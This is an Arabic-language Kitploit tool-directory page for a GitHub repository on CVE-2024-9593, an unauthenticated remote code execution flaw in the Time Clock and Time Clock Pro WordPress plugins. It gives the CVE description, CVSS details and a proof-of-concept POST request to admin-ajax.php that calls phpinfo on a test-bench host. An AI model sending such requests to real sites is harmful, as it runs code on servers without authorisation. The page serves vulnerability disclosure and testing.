Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-9593 — Time Clock <= 1.2.2 و Time Clock Pro <= 1.1.4 - غير مصادق (محدود) تنفيذ الأكواد عن بُعد | Kitploit
أدوات/GitHubGitHub/randomrobbiebf/cve-2024-9593
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubrandomrobbiebf/cve-2024-9593

CVE-2024-9593

Time Clock <= 1.2.2 و Time Clock Pro <= 1.1.4 - غير مصادق (محدود) تنفيذ الأكواد عن بُعد

عرض المستودع
82منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-9593

Time Clock <= 1.2.2 & Time Clock Pro <= 1.1.4 - تنفيذ تعليمات برمجية عن بُعد (محدود) بدون مصادقة

الوصف:

إضافة Time Clock وإضافة Time Clock Pro لووردبريس معرضتان لثغرة تنفيذ تعليمات برمجية عن بُعد في الإصدارات حتى 1.2.2 (لـ Time Clock) و1.1.4 (لـ Time Clock Pro) عبر الدالة 'etimeclockwp_load_function_callback'. وهذا يسمح للمهاجمين غير المصادق عليهم بتنفيذ كود على الخادم. لا يمكن تحديد معاملات الدالة المستدعاة.

التفاصيل:

root@kitploit:~
تاريخ النشر: 2024-10-18 00:00:00
CVE: CVE-2024-9593
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
درجة CVSS: 8.3
الأسماء المختصرة (Slugs): time-clock-pro, time-clock

إثبات المفهوم (POC)

root@kitploit:~
POST /wp-admin/admin-ajax.php?action=etimeclockwp_load_function HTTP/2
Host: wpscan-vulnerability-test-bench.ddev.site
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

function=phpinfo

تنزيل الأداة